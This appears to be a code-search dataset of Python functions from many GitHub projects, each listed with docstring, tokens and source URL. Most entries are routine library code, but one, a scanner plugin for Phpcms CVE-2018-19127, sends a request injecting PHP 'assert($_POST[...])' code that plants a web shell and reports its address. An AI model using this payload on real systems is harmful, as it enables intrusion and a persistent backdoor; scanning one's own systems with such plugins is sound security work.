[ "def", "_clean_zip", "(", "result_dict", ":", "Dict", "[", "str", ",", "str", "]", ",", "zipcode", ":", "str", ")", "->", "None", ":", "result_dict", "[", "\"zipcode\"", "]", "=", "zipcode" ]
https://github.com/sfu-db/dataprep/blob/6dfb9c659e8bf73f07978ae195d0372495c6f118/dataprep/clean/clean_address.py#L433-L437
open-cogsci/OpenSesame
c4a3641b097a80a76937edbd8c365f036bcc9705
openexp/_canvas/canvas.py
python
Canvas.init_display
(experiment)
visible: False desc: Initializes the display before the experiment begins. arguments: experiment: desc: An experiment object. type: experiment
visible: False
[ "visible", ":", "False" ]
def init_display(experiment): """ visible: False desc: Initializes the display before the experiment begins. arguments: experiment: desc: An experiment object. type: experiment """ raise NotImplementedError()
[ "def", "init_display", "(", "experiment", ")", ":", "raise", "NotImplementedError", "(", ")" ]
https://github.com/open-cogsci/OpenSesame/blob/c4a3641b097a80a76937edbd8c365f036bcc9705/openexp/_canvas/canvas.py#L1443-L1457
Theano/Theano
8fd9203edfeecebced9344b0c70193be292a9ade
theano/tensor/var.py
python
_tensor_py_operators.sort
(self, axis=-1, kind='quicksort', order=None)
return theano.tensor.sort(self, axis, kind, order)
See `theano.tensor.sort`.
See `theano.tensor.sort`.
[ "See", "theano", ".", "tensor", ".", "sort", "." ]
def sort(self, axis=-1, kind='quicksort', order=None): """See `theano.tensor.sort`.""" return theano.tensor.sort(self, axis, kind, order)
[ "def", "sort", "(", "self", ",", "axis", "=", "-", "1", ",", "kind", "=", "'quicksort'", ",", "order", "=", "None", ")", ":", "return", "theano", ".", "tensor", ".", "sort", "(", "self", ",", "axis", ",", "kind", ",", "order", ")" ]
https://github.com/Theano/Theano/blob/8fd9203edfeecebced9344b0c70193be292a9ade/theano/tensor/var.py#L740-L742
mchristopher/PokemonGo-DesktopMap
ec37575f2776ee7d64456e2a1f6b6b78830b4fe0
app/pywin/Lib/collections.py
python
OrderedDict.items
(self)
return [(key, self[key]) for key in self]
od.items() -> list of (key, value) pairs in od
od.items() -> list of (key, value) pairs in od
[ "od", ".", "items", "()", "-", ">", "list", "of", "(", "key", "value", ")", "pairs", "in", "od" ]
def items(self): 'od.items() -> list of (key, value) pairs in od' return [(key, self[key]) for key in self]
[ "def", "items", "(", "self", ")", ":", "return", "[", "(", "key", ",", "self", "[", "key", "]", ")", "for", "key", "in", "self", "]" ]
https://github.com/mchristopher/PokemonGo-DesktopMap/blob/ec37575f2776ee7d64456e2a1f6b6b78830b4fe0/app/pywin/Lib/collections.py#L125-L127
bendmorris/static-python
2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473
Lib/wsgiref/headers.py
python
Headers.__setitem__
(self, name, val)
Set the value of a header.
Set the value of a header.
[ "Set", "the", "value", "of", "a", "header", "." ]
def __setitem__(self, name, val): """Set the value of a header.""" del self[name] self._headers.append( (self._convert_string_type(name), self._convert_string_type(val)))
[ "def", "__setitem__", "(", "self", ",", "name", ",", "val", ")", ":", "del", "self", "[", "name", "]", "self", ".", "_headers", ".", "append", "(", "(", "self", ".", "_convert_string_type", "(", "name", ")", ",", "self", ".", "_convert_string_type", "(...
https://github.com/bendmorris/static-python/blob/2e0f8c4d7ed5b359dc7d8a75b6fb37e6b6c5c473/Lib/wsgiref/headers.py#L52-L56
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/compat/_overloaded_dict.py
python
KeyOverload._set
(parent, key, value)
[]
def _set(parent, key, value): parent.data[key] = value
[ "def", "_set", "(", "parent", ",", "key", ",", "value", ")", ":", "parent", ".", "data", "[", "key", "]", "=", "value" ]
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/compat/_overloaded_dict.py#L52-L53
taomujian/linbing
fe772a58f41e3b046b51a866bdb7e4655abaf51a
python/app/plugins/http/Phpcms/CVE_2018_19127.py
python
CVE_2018_19127_BaseVerify.check
(self)
Check whether the vulnerability exists :param: :return bool True or False: whether the vulnerability exists
Check whether the vulnerability exists
[ "Check", "whether", "the", "vulnerability", "exists" ]
def check(self): """ 检测是否存在漏洞 :param: :return bool True or False: 是否存在漏洞 """ url = self.url + "/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss" try: results = request.get(url, headers = self.headers).text c = re.findall(r"function.assert'>(.+?)</a>",results) if c[0] == "function.assert": print('存在CVE-2018-19127漏洞,WebShell地址为:' + self.url + '/data/cache_template/rss.tpl.php|secfree') return True else: print('不存在CVE-2018-19127漏洞') return False except Exception as e: print(e) print('不存在CVE-2018-19127漏洞') return False finally: pass
[ "def", "check", "(", "self", ")", ":", "url", "=", "self", ".", "url", "+", "\"/type.php?template=tag_(){};@unlink(FILE);assert($_POST[secfree]);{//../rss\"", "try", ":", "results", "=", "request", ".", "get", "(", "url", ",", "headers", "=", "self", ".", "heade...
https://github.com/taomujian/linbing/blob/fe772a58f41e3b046b51a866bdb7e4655abaf51a/python/app/plugins/http/Phpcms/CVE_2018_19127.py#L23-L48
freedombox/FreedomBox
335a7f92cc08f27981f838a7cddfc67740598e54
plinth/notification.py
python
Notification.get_display_context
(request, user)
return {'notifications': notes, 'max_severity': max_severity}
Return a list of notifications meant for display to a user.
Return a list of notifications meant for display to a user.
[ "Return", "a", "list", "of", "notifications", "meant", "for", "display", "to", "a", "user", "." ]
def get_display_context(request, user): """Return a list of notifications meant for display to a user.""" notifications = Notification.list(user=user) max_severity = max(notifications, default=None, key=lambda note: note.severity_value) max_severity = max_severity.severity if max_severity else None notes = [] for note in notifications: data = Notification._translate_dict(note.data, note.data) actions = copy.deepcopy(note.actions) for action in actions: if 'text' in action: action['text'] = Notification._translate( action['text'], data) body = Notification._render(request, note.body_template, data) notes.append({ 'id': note.id, 'app_id': note.app_id, 'severity': note.severity, 'title': Notification._translate(note.title, data), 'message': Notification._translate(note.message, data), 'body': body, 'actions': actions, 'data': data, 'created_time': note.created_time, 'last_update_time': note.last_update_time, 'user': note.user, 'group': note.group, 'dismissed': note.dismissed, }) return {'notifications': notes, 'max_severity': max_severity}
[ "def", "get_display_context", "(", "request", ",", "user", ")", ":", "notifications", "=", "Notification", ".", "list", "(", "user", "=", "user", ")", "max_severity", "=", "max", "(", "notifications", ",", "default", "=", "None", ",", "key", "=", "lambda",...
https://github.com/freedombox/FreedomBox/blob/335a7f92cc08f27981f838a7cddfc67740598e54/plinth/notification.py#L332-L365
bruderstein/PythonScript
df9f7071ddf3a079e3a301b9b53a6dc78cf1208f
PythonScript/src/CreateWrapper.py
python
contents
(filename)
[]
def contents(filename): with open(filename) as f: return f.read()
[ "def", "contents", "(", "filename", ")", ":", "with", "open", "(", "filename", ")", "as", "f", ":", "return", "f", ".", "read", "(", ")" ]
https://github.com/bruderstein/PythonScript/blob/df9f7071ddf3a079e3a301b9b53a6dc78cf1208f/PythonScript/src/CreateWrapper.py#L894-L896
linxid/Machine_Learning_Study_Path
558e82d13237114bbb8152483977806fc0c222af
Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/lockfile/sqlitelockfile.py
python
SQLiteLockFile.acquire
(self, timeout=None)
[]
def acquire(self, timeout=None): timeout = timeout if timeout is not None else self.timeout end_time = time.time() if timeout is not None and timeout > 0: end_time += timeout if timeout is None: wait = 0.1 elif timeout <= 0: wait = 0 else: wait = timeout / 10 cursor = self.connection.cursor() while True: if not self.is_locked(): # Not locked. Try to lock it. cursor.execute("insert into locks" " (lock_file, unique_name)" " values" " (?, ?)", (self.lock_file, self.unique_name)) self.connection.commit() # Check to see if we are the only lock holder. cursor.execute("select * from locks" " where unique_name = ?", (self.unique_name,)) rows = cursor.fetchall() if len(rows) > 1: # Nope. Someone else got there. Remove our lock. cursor.execute("delete from locks" " where unique_name = ?", (self.unique_name,)) self.connection.commit() else: # Yup. We're done, so go home. return else: # Check to see if we are the only lock holder. cursor.execute("select * from locks" " where unique_name = ?", (self.unique_name,)) rows = cursor.fetchall() if len(rows) == 1: # We're the locker, so go home. return # Maybe we should wait a bit longer. if timeout is not None and time.time() > end_time: if timeout > 0: # No more waiting. raise LockTimeout("Timeout waiting to acquire" " lock for %s" % self.path) else: # Someone else has the lock and we are impatient.. raise AlreadyLocked("%s is already locked" % self.path) # Well, okay. We'll give it a bit longer. time.sleep(wait)
[ "def", "acquire", "(", "self", ",", "timeout", "=", "None", ")", ":", "timeout", "=", "timeout", "if", "timeout", "is", "not", "None", "else", "self", ".", "timeout", "end_time", "=", "time", ".", "time", "(", ")", "if", "timeout", "is", "not", "None...
https://github.com/linxid/Machine_Learning_Study_Path/blob/558e82d13237114bbb8152483977806fc0c222af/Machine Learning In Action/Chapter8-Regression/venv/Lib/site-packages/pip-9.0.1-py3.6.egg/pip/_vendor/lockfile/sqlitelockfile.py#L53-L114
DingGuodong/LinuxBashShellScriptForOps
d5727b985f920292a10698a3c9751d5dff5fc1a3
projects/LinuxSystemOps/AutoDevOps/Fabric/Fabric2.x/fabric2-application-template-for-root.py
python
is_apt
()
:return:
:return:
[ ":", "return", ":" ]
def is_apt(): """ :return: """ run_result = cxn.run('command -v apt', hide=True, warn=True) if run_result.ok: return True else: return False
[ "def", "is_apt", "(", ")", ":", "run_result", "=", "cxn", ".", "run", "(", "'command -v apt'", ",", "hide", "=", "True", ",", "warn", "=", "True", ")", "if", "run_result", ".", "ok", ":", "return", "True", "else", ":", "return", "False" ]
https://github.com/DingGuodong/LinuxBashShellScriptForOps/blob/d5727b985f920292a10698a3c9751d5dff5fc1a3/projects/LinuxSystemOps/AutoDevOps/Fabric/Fabric2.x/fabric2-application-template-for-root.py#L119-L127
naftaliharris/tauthon
5587ceec329b75f7caf6d65a036db61ac1bae214
Lib/uuid.py
python
_netbios_getnode
()
Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.
Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.
[ "Get", "the", "hardware", "address", "on", "Windows", "using", "NetBIOS", "calls", ".", "See", "http", ":", "//", "support", ".", "microsoft", ".", "com", "/", "kb", "/", "118623", "for", "details", "." ]
def _netbios_getnode(): """Get the hardware address on Windows using NetBIOS calls. See http://support.microsoft.com/kb/118623 for details.""" import win32wnet, netbios ncb = netbios.NCB() ncb.Command = netbios.NCBENUM ncb.Buffer = adapters = netbios.LANA_ENUM() adapters._pack() if win32wnet.Netbios(ncb) != 0: return adapters._unpack() for i in range(adapters.length): ncb.Reset() ncb.Command = netbios.NCBRESET ncb.Lana_num = ord(adapters.lana[i]) if win32wnet.Netbios(ncb) != 0: continue ncb.Reset() ncb.Command = netbios.NCBASTAT ncb.Lana_num = ord(adapters.lana[i]) ncb.Callname = '*'.ljust(16) ncb.Buffer = status = netbios.ADAPTER_STATUS() if win32wnet.Netbios(ncb) != 0: continue status._unpack() bytes = map(ord, status.adapter_address) return ((bytes[0]<<40L) + (bytes[1]<<32L) + (bytes[2]<<24L) + (bytes[3]<<16L) + (bytes[4]<<8L) + bytes[5])
[ "def", "_netbios_getnode", "(", ")", ":", "import", "win32wnet", ",", "netbios", "ncb", "=", "netbios", ".", "NCB", "(", ")", "ncb", ".", "Command", "=", "netbios", ".", "NCBENUM", "ncb", ".", "Buffer", "=", "adapters", "=", "netbios", ".", "LANA_ENUM", ...
https://github.com/naftaliharris/tauthon/blob/5587ceec329b75f7caf6d65a036db61ac1bae214/Lib/uuid.py#L425-L452
huggingface/transformers
623b4f7c63f60cce917677ee704d6c93ee960b4b
examples/research_projects/visual_bert/modeling_frcnn.py
python
RPNOutputs.__init__
( self, box2box_transform, anchor_matcher, batch_size_per_image, positive_fraction, images, pred_objectness_logits, pred_anchor_deltas, anchors, boundary_threshold=0, gt_boxes=None, smooth_l1_beta=0.0, )
Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored
Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored
[ "Args", ":", "box2box_transform", "(", "Box2BoxTransform", ")", ":", ":", "class", ":", "Box2BoxTransform", "instance", "for", "anchor", "-", "proposal", "transformations", ".", "anchor_matcher", "(", "Matcher", ")", ":", ":", "class", ":", "Matcher", "instance"...
def __init__( self, box2box_transform, anchor_matcher, batch_size_per_image, positive_fraction, images, pred_objectness_logits, pred_anchor_deltas, anchors, boundary_threshold=0, gt_boxes=None, smooth_l1_beta=0.0, ): """ Args: box2box_transform (Box2BoxTransform): :class:`Box2BoxTransform` instance for anchor-proposal transformations. anchor_matcher (Matcher): :class:`Matcher` instance for matching anchors to ground-truth boxes; used to determine training labels. batch_size_per_image (int): number of proposals to sample when training positive_fraction (float): target fraction of sampled proposals that should be positive images (ImageList): :class:`ImageList` instance representing N input images pred_objectness_logits (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A, Hi, W) pred_anchor_deltas (list[Tensor]): A list of L elements. Element i is a tensor of shape (N, A*4, Hi, Wi) anchors (list[torch.Tensor]): nested list of boxes. anchors[i][j] at (n, l) stores anchor array for feature map l boundary_threshold (int): if >= 0, then anchors that extend beyond the image boundary by more than boundary_thresh are not used in training. gt_boxes (list[Boxes], optional): A list of N elements. smooth_l1_beta (float): The transition point between L1 and L2 lossn. When set to 0, the loss becomes L1. When +inf, it is ignored """ self.box2box_transform = box2box_transform self.anchor_matcher = anchor_matcher self.batch_size_per_image = batch_size_per_image self.positive_fraction = positive_fraction self.pred_objectness_logits = pred_objectness_logits self.pred_anchor_deltas = pred_anchor_deltas self.anchors = anchors self.gt_boxes = gt_boxes self.num_feature_maps = len(pred_objectness_logits) self.num_images = len(images) self.boundary_threshold = boundary_threshold self.smooth_l1_beta = smooth_l1_beta
[ "def", "__init__", "(", "self", ",", "box2box_transform", ",", "anchor_matcher", ",", "batch_size_per_image", ",", "positive_fraction", ",", "images", ",", "pred_objectness_logits", ",", "pred_anchor_deltas", ",", "anchors", ",", "boundary_threshold", "=", "0", ",", ...
https://github.com/huggingface/transformers/blob/623b4f7c63f60cce917677ee704d6c93ee960b4b/examples/research_projects/visual_bert/modeling_frcnn.py#L627-L667
yandexdataschool/AgentNet
c28b99f11eb5d1c9080c2368f387b2cc4942adc3
agentnet/objective/base.py
python
BaseObjective.get_reward
(self, last_environment_states, agent_actions, batch_id)
WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state. :param last_environment_states: Environment state before taking action. :type last_environment_states: float[time_i, memory_id] :param agent_actions: Agent action at this tick. :type agent_actions: int[time_i] :param batch_id: Session id. :type batch_id: int :return: Reward for taking action. :rtype: float[time_i]
WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state.
[ "WARNING!", "This", "function", "is", "computed", "on", "a", "single", "session", "not", "on", "a", "batch!", "Reward", "given", "for", "taking", "the", "action", "in", "current", "environment", "state", "." ]
def get_reward(self, last_environment_states, agent_actions, batch_id): """WARNING! This function is computed on a single session, not on a batch! Reward given for taking the action in current environment state. :param last_environment_states: Environment state before taking action. :type last_environment_states: float[time_i, memory_id] :param agent_actions: Agent action at this tick. :type agent_actions: int[time_i] :param batch_id: Session id. :type batch_id: int :return: Reward for taking action. :rtype: float[time_i] """ raise NotImplementedError
[ "def", "get_reward", "(", "self", ",", "last_environment_states", ",", "agent_actions", ",", "batch_id", ")", ":", "raise", "NotImplementedError" ]
https://github.com/yandexdataschool/AgentNet/blob/c28b99f11eb5d1c9080c2368f387b2cc4942adc3/agentnet/objective/base.py#L19-L36
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/zabbix/__init__.py
python
setup
(hass: HomeAssistant, config: ConfigType)
return True
Set up the Zabbix component.
Set up the Zabbix component.
[ "Set", "up", "the", "Zabbix", "component", "." ]
def setup(hass: HomeAssistant, config: ConfigType) -> bool: """Set up the Zabbix component.""" conf = config[DOMAIN] protocol = "https" if conf[CONF_SSL] else "http" url = urljoin(f"{protocol}://{conf[CONF_HOST]}", conf[CONF_PATH]) username = conf.get(CONF_USERNAME) password = conf.get(CONF_PASSWORD) publish_states_host = conf.get(CONF_PUBLISH_STATES_HOST) entities_filter = convert_include_exclude_filter(conf) try: zapi = ZabbixAPI(url=url, user=username, password=password) _LOGGER.info("Connected to Zabbix API Version %s", zapi.api_version()) except ZabbixAPIException as login_exception: _LOGGER.error("Unable to login to the Zabbix API: %s", login_exception) return False except HTTPError as http_error: _LOGGER.error("HTTPError when connecting to Zabbix API: %s", http_error) zapi = None _LOGGER.error(RETRY_MESSAGE, http_error) event_helper.call_later(hass, RETRY_INTERVAL, lambda _: setup(hass, config)) return True hass.data[DOMAIN] = zapi def event_to_metrics(event, float_keys, string_keys): """Add an event to the outgoing Zabbix list.""" state = event.data.get("new_state") if state is None or state.state in (STATE_UNKNOWN, "", STATE_UNAVAILABLE): return entity_id = state.entity_id if not entities_filter(entity_id): return floats = {} strings = {} try: _state_as_value = float(state.state) floats[entity_id] = _state_as_value except ValueError: try: _state_as_value = float(state_helper.state_as_number(state)) floats[entity_id] = _state_as_value except ValueError: strings[entity_id] = state.state for key, value in state.attributes.items(): # For each value we try to cast it as float # But if we can not do it we store the value # as string attribute_id = f"{entity_id}/{key}" try: float_value = float(value) except (ValueError, TypeError): float_value = None if float_value is None or not math.isfinite(float_value): strings[attribute_id] = str(value) else: floats[attribute_id] = float_value metrics = [] float_keys_count = len(float_keys) float_keys.update(floats) if len(float_keys) != float_keys_count: floats_discovery = [] for float_key in float_keys: floats_discovery.append({"{#KEY}": float_key}) metric = ZabbixMetric( publish_states_host, "homeassistant.floats_discovery", json.dumps(floats_discovery), ) metrics.append(metric) for key, value in floats.items(): metric = ZabbixMetric( publish_states_host, f"homeassistant.float[{key}]", value ) metrics.append(metric) string_keys.update(strings) return metrics if publish_states_host: zabbix_sender = ZabbixSender(zabbix_server=conf[CONF_HOST]) instance = ZabbixThread(hass, zabbix_sender, event_to_metrics) instance.setup(hass) return True
[ "def", "setup", "(", "hass", ":", "HomeAssistant", ",", "config", ":", "ConfigType", ")", "->", "bool", ":", "conf", "=", "config", "[", "DOMAIN", "]", "protocol", "=", "\"https\"", "if", "conf", "[", "CONF_SSL", "]", "else", "\"http\"", "url", "=", "u...
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/zabbix/__init__.py#L69-L161
boto/botocore
f36f59394263539ed31f5a8ceb552a85354a552c
botocore/eventstream.py
python
DecodeUtils.unpack_int8
(data)
return value, 1
Parse a signed 8-bit integer from the bytes. :type data: bytes :param data: The bytes to parse from. :rtype: (int, int) :returns: A tuple containing the (parsed integer value, bytes consumed)
Parse a signed 8-bit integer from the bytes.
[ "Parse", "a", "signed", "8", "-", "bit", "integer", "from", "the", "bytes", "." ]
def unpack_int8(data): """Parse a signed 8-bit integer from the bytes. :type data: bytes :param data: The bytes to parse from. :rtype: (int, int) :returns: A tuple containing the (parsed integer value, bytes consumed) """ value = unpack(DecodeUtils.INT8_BYTE_FORMAT, data[:1])[0] return value, 1
[ "def", "unpack_int8", "(", "data", ")", ":", "value", "=", "unpack", "(", "DecodeUtils", ".", "INT8_BYTE_FORMAT", ",", "data", "[", ":", "1", "]", ")", "[", "0", "]", "return", "value", ",", "1" ]
https://github.com/boto/botocore/blob/f36f59394263539ed31f5a8ceb552a85354a552c/botocore/eventstream.py#L152-L162
pandas-dev/pandas
5ba7d714014ae8feaccc0dd4a98890828cf2832d
pandas/core/arrays/categorical.py
python
Categorical._values_for_rank
(self)
return values
For correctly ranking ordered categorical data. See GH#15420 Ordered categorical data should be ranked on the basis of codes with -1 translated to NaN. Returns ------- numpy.array
For correctly ranking ordered categorical data. See GH#15420
[ "For", "correctly", "ranking", "ordered", "categorical", "data", ".", "See", "GH#15420" ]
def _values_for_rank(self): """ For correctly ranking ordered categorical data. See GH#15420 Ordered categorical data should be ranked on the basis of codes with -1 translated to NaN. Returns ------- numpy.array """ from pandas import Series if self.ordered: values = self.codes mask = values == -1 if mask.any(): values = values.astype("float64") values[mask] = np.nan elif self.categories.is_numeric(): values = np.array(self) else: # reorder the categories (so rank can use the float codes) # instead of passing an object array to rank values = np.array( self.rename_categories(Series(self.categories).rank().values) ) return values
[ "def", "_values_for_rank", "(", "self", ")", ":", "from", "pandas", "import", "Series", "if", "self", ".", "ordered", ":", "values", "=", "self", ".", "codes", "mask", "=", "values", "==", "-", "1", "if", "mask", ".", "any", "(", ")", ":", "values", ...
https://github.com/pandas-dev/pandas/blob/5ba7d714014ae8feaccc0dd4a98890828cf2832d/pandas/core/arrays/categorical.py#L1878-L1906
flexxui/flexx
69b85b308b505a8621305458a5094f2a6addd720
flexx/app/bsdf_lite.py
python
BsdfLiteSerializer.load
(self, f)
return self._decode(f)
Load a BSDF-encoded object from the given file object.
Load a BSDF-encoded object from the given file object.
[ "Load", "a", "BSDF", "-", "encoded", "object", "from", "the", "given", "file", "object", "." ]
def load(self, f): """ Load a BSDF-encoded object from the given file object. """ # Check magic string if f.read(4) != b'BSDF': raise RuntimeError('This does not look a BSDF file.') # Check version major_version = strunpack('<B', f.read(1))[0] minor_version = strunpack('<B', f.read(1))[0] file_version = '%i.%i' % (major_version, minor_version) if major_version != VERSION[0]: # major version should be 2 t = ('Reading file with different major version (%s) ' 'from the implementation (%s).') raise RuntimeError(t % (file_version, __version__)) if minor_version > VERSION[1]: # minor should be < ours t = ('BSDF warning: reading file with higher minor version (%s) ' 'than the implementation (%s).') logger.warning(t % (file_version, __version__)) return self._decode(f)
[ "def", "load", "(", "self", ",", "f", ")", ":", "# Check magic string", "if", "f", ".", "read", "(", "4", ")", "!=", "b'BSDF'", ":", "raise", "RuntimeError", "(", "'This does not look a BSDF file.'", ")", "# Check version", "major_version", "=", "strunpack", "...
https://github.com/flexxui/flexx/blob/69b85b308b505a8621305458a5094f2a6addd720/flexx/app/bsdf_lite.py#L415-L434
haiwen/seafile-docker
2d2461d4c8cab3458ec9832611c419d47506c300
scripts/upgrade.py
python
fix_media_symlinks
(current_version)
If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink.
If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink.
[ "If", "the", "container", "was", "recreated", "and", "it", "s", "not", "a", "minor", "/", "major", "upgrade", "we", "need", "to", "fix", "the", "media", "/", "avatars", "and", "media", "/", "custom", "symlink", "." ]
def fix_media_symlinks(current_version): """ If the container was recreated and it's not a minor/major upgrade, we need to fix the media/avatars and media/custom symlink. """ media_dir = join( installdir, 'seafile-server-{}/seahub/media'.format(current_version) ) avatars_dir = join(media_dir, 'avatars') if not islink(avatars_dir): logger.info('The container was recreated, running minor-upgrade.sh to fix the media symlinks') run_minor_upgrade(current_version)
[ "def", "fix_media_symlinks", "(", "current_version", ")", ":", "media_dir", "=", "join", "(", "installdir", ",", "'seafile-server-{}/seahub/media'", ".", "format", "(", "current_version", ")", ")", "avatars_dir", "=", "join", "(", "media_dir", ",", "'avatars'", ")...
https://github.com/haiwen/seafile-docker/blob/2d2461d4c8cab3458ec9832611c419d47506c300/scripts/upgrade.py#L67-L79
chartbeat-labs/textacy
40cd12fe953ef8be5958cff93ad8762262f3b757
src/textacy/tokenizers/terms.py
python
_concat_extract_ngrams
(doclike: types.DocLike, ns: Collection[int])
[]
def _concat_extract_ngrams(doclike: types.DocLike, ns: Collection[int]) -> Iterable[Span]: for n in ns: ngrams = extract.ngrams(doclike, n=n) for ngram in ngrams: yield ngram
[ "def", "_concat_extract_ngrams", "(", "doclike", ":", "types", ".", "DocLike", ",", "ns", ":", "Collection", "[", "int", "]", ")", "->", "Iterable", "[", "Span", "]", ":", "for", "n", "in", "ns", ":", "ngrams", "=", "extract", ".", "ngrams", "(", "do...
https://github.com/chartbeat-labs/textacy/blob/40cd12fe953ef8be5958cff93ad8762262f3b757/src/textacy/tokenizers/terms.py#L144-L148
XKNX/xknx
1deeeb3dc0978aebacf14492a84e1f1eaf0970ed
xknx/devices/cover.py
python
Cover.auto_stop_if_necessary
(self)
Do auto stop if necessary.
Do auto stop if necessary.
[ "Do", "auto", "stop", "if", "necessary", "." ]
async def auto_stop_if_necessary(self) -> None: """Do auto stop if necessary.""" # If device does not support auto_positioning, # we have to stop the device when position is reached, # unless device was traveling to fully open # or fully closed state. if ( self.supports_stop and not self.position_target.writable and self.position_reached() and not self.is_open() and not self.is_closed() ): await self.stop()
[ "async", "def", "auto_stop_if_necessary", "(", "self", ")", "->", "None", ":", "# If device does not support auto_positioning,", "# we have to stop the device when position is reached,", "# unless device was traveling to fully open", "# or fully closed state.", "if", "(", "self", "."...
https://github.com/XKNX/xknx/blob/1deeeb3dc0978aebacf14492a84e1f1eaf0970ed/xknx/devices/cover.py#L258-L271
home-assistant/core
265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1
homeassistant/components/nuheat/climate.py
python
NuHeatThermostat.hvac_modes
(self)
return OPERATION_LIST
Return list of possible operation modes.
Return list of possible operation modes.
[ "Return", "list", "of", "possible", "operation", "modes", "." ]
def hvac_modes(self): """Return list of possible operation modes.""" return OPERATION_LIST
[ "def", "hvac_modes", "(", "self", ")", ":", "return", "OPERATION_LIST" ]
https://github.com/home-assistant/core/blob/265ebd17a3f17ed8dc1e9bdede03ac8e323f1ab1/homeassistant/components/nuheat/climate.py#L187-L189
pyqt/examples
843bb982917cecb2350b5f6d7f42c9b7fb142ec1
src/pyqt-official/itemviews/frozencolumn/frozencolumn.py
python
FreezeTableWidget.init
(self)
[]
def init(self): self.frozenTableView.setModel(self.model()) self.frozenTableView.setFocusPolicy(Qt.NoFocus) self.frozenTableView.verticalHeader().hide() self.frozenTableView.horizontalHeader().setSectionResizeMode( QHeaderView.Fixed) self.viewport().stackUnder(self.frozenTableView) self.frozenTableView.setStyleSheet(''' QTableView { border: none; background-color: #8EDE21; selection-background-color: #999; }''') # for demo purposes self.frozenTableView.setSelectionModel(self.selectionModel()) for col in range(1, self.model().columnCount()): self.frozenTableView.setColumnHidden(col, True) self.frozenTableView.setColumnWidth(0, self.columnWidth(0)) self.frozenTableView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff) self.frozenTableView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff) self.frozenTableView.show() self.updateFrozenTableGeometry() self.setHorizontalScrollMode(self.ScrollPerPixel) self.setVerticalScrollMode(self.ScrollPerPixel) self.frozenTableView.setVerticalScrollMode(self.ScrollPerPixel)
[ "def", "init", "(", "self", ")", ":", "self", ".", "frozenTableView", ".", "setModel", "(", "self", ".", "model", "(", ")", ")", "self", ".", "frozenTableView", ".", "setFocusPolicy", "(", "Qt", ".", "NoFocus", ")", "self", ".", "frozenTableView", ".", ...
https://github.com/pyqt/examples/blob/843bb982917cecb2350b5f6d7f42c9b7fb142ec1/src/pyqt-official/itemviews/frozencolumn/frozencolumn.py#L72-L96
yuxiaokui/Intranet-Penetration
f57678a204840c83cbf3308e3470ae56c5ff514b
proxy/XX-Net/code/default/python27/1.0/lib/codecs.py
python
make_encoding_map
(decoding_map)
return m
Creates an encoding map from a decoding map. If a target mapping in the decoding map occurs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \\u001a.
Creates an encoding map from a decoding map.
[ "Creates", "an", "encoding", "map", "from", "a", "decoding", "map", "." ]
def make_encoding_map(decoding_map): """ Creates an encoding map from a decoding map. If a target mapping in the decoding map occurs multiple times, then that target is mapped to None (undefined mapping), causing an exception when encountered by the charmap codec during translation. One example where this happens is cp875.py which decodes multiple character to \\u001a. """ m = {} for k,v in decoding_map.items(): if not v in m: m[v] = k else: m[v] = None return m
[ "def", "make_encoding_map", "(", "decoding_map", ")", ":", "m", "=", "{", "}", "for", "k", ",", "v", "in", "decoding_map", ".", "items", "(", ")", ":", "if", "not", "v", "in", "m", ":", "m", "[", "v", "]", "=", "k", "else", ":", "m", "[", "v"...
https://github.com/yuxiaokui/Intranet-Penetration/blob/f57678a204840c83cbf3308e3470ae56c5ff514b/proxy/XX-Net/code/default/python27/1.0/lib/codecs.py#L1062-L1081
gem/oq-engine
1bdb88f3914e390abcbd285600bfd39477aae47c
